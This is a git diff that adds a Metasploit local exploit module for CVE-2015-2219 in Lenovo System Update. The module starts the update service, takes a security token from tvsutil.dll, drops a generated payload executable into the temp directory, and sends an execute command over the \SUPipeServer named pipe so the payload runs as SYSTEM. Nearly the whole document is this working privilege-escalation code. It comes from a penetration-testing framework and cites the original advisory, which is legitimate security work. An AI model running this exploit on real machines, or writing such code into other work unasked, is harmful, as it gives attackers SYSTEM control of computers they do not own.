diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb new file mode 100644 index 0000000000..7f998fbb4f --- /dev/null +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -0,0 +1,193 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Exploit::FileDropper + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Services + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Lenovo System Update Privilege Escalation', + 'Description' => %q{ + The named pipe, \SUPipeServer, can be accessed by normal users to interact + with the System update service. The service provides the possibility to execute + arbitrary commands as SYSTEM if a valid security token is provided. This token can + be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll + + Please note that the System Update is stopped by default but can be started/stopped calling + the Executable ConfigService.exe + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Micahel Milvich', # vulnerability discovery, advisory + 'Sofiane Talmat', # vulnerability discovery, advisory + 'h0ng10' # Metasploit module + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Windows', { } ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'References' => + [ + ['OSVDB', '121522'], + ['CVE', '2015-2219'], + ['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf'] + ], + 'DisclosureDate' => 'Apr 12 2015', + 'DefaultTarget' => 0 + })) + + register_options([ + OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']), + OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]), + ], self.class) + + end + + def check + os = sysinfo['OS'] + + unless os =~ /windows/i + return Exploit::CheckCode::Safe + end + + svc = service_info('SUService') + if svc && svc[:display] =~ /System Update/ + vprint_good("Found service '#{svc[:display]}'") + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + + def write_named_pipe(pipe, command) + invalid_handle_value = 0xFFFFFFFF + + r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0) + handle = r['return'] + + if handle == invalid_handle_value + fail_with(Failure::NoTarget, "\\\\.\\pipe\\SUPipeServer named pipe not found") + else + vprint_good("Opended \\\\.\\pipe\\SUPipeServer! Proceeding...") + end + + # First, write the string length as Int32 value + w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil) + + if w['return'] == false + print_error('The was an error writing to pipe, check permissions') + return false + end + + # Then we send the real command + w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil) + + if w['return'] == false + print_error('The was an error writing to pipe, check permissions') + return false + end + + true + end + + + def get_security_token(lenovo_directory) + if not client.railgun.get_dll('tvsutil') then + client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll") + client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl") + end + + dll_response = client.railgun.tvsutil.GetSystemInfoData(256) + return dll_response['systeminfo'][0,40] + end + + + def config_service(lenovo_directory, option) + cmd_exec(lenovo_directory + "ConfigService.exe #{option}") + end + + + def exploit + if is_system? + fail_with(Failure::NoTarget, 'Session is already elevated') + end + + su_directory = service_info('SUService')[:path][1..-15] + + print_status("Starting service via ConfigService.exe") + config_service(su_directory, "start") + print_status("Giving the service some time to start...") + sleep(datastore['sleep']) + + print_status("Getting security token...") + token = get_security_token(su_directory) + vprint_good("Security token is: #{token}") + + + if datastore['WritableDir'] and not datastore['WritableDir'].empty? + temp_dir = datastore['WritableDir'] + else + temp_dir = client.sys.config.getenv('TEMP') + end + + print_status("Using #{temp_dir} to drop malicious exe") + + begin + cd(temp_dir) + rescue Rex::Post::Meterpreter::RequestError + session.railgun.kernel32.CloseHandle(handle) + fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory") + end + + print_status('Writing malicious exe to remote filesystem') + write_path = pwd + exe_name = "#{rand_text_alpha(10 + rand(10))}.exe" + + begin + write_file(exe_name, generate_payload_exe) + register_file_for_cleanup("#{write_path}\\#{exe_name}") + rescue Rex::Post::Meterpreter::RequestError + session.railgun.kernel32.CloseHandle(handle) + fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}") + end + + print_status('Sending Execute command to update service') + + begin + write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}") + rescue Rex::Post::Meterpreter::RequestError + session.railgun.kernel32.CloseHandle(handle) + fail_with(Failure::Unknown, 'Failed to write to pipe') + end + + unless write_res + fail_with(Failure::Unknown, 'Failed to write to pipe') + end + + print_status("Stopping service via ConfigService.exe") + config_service(su_directory, "stop") + end + +end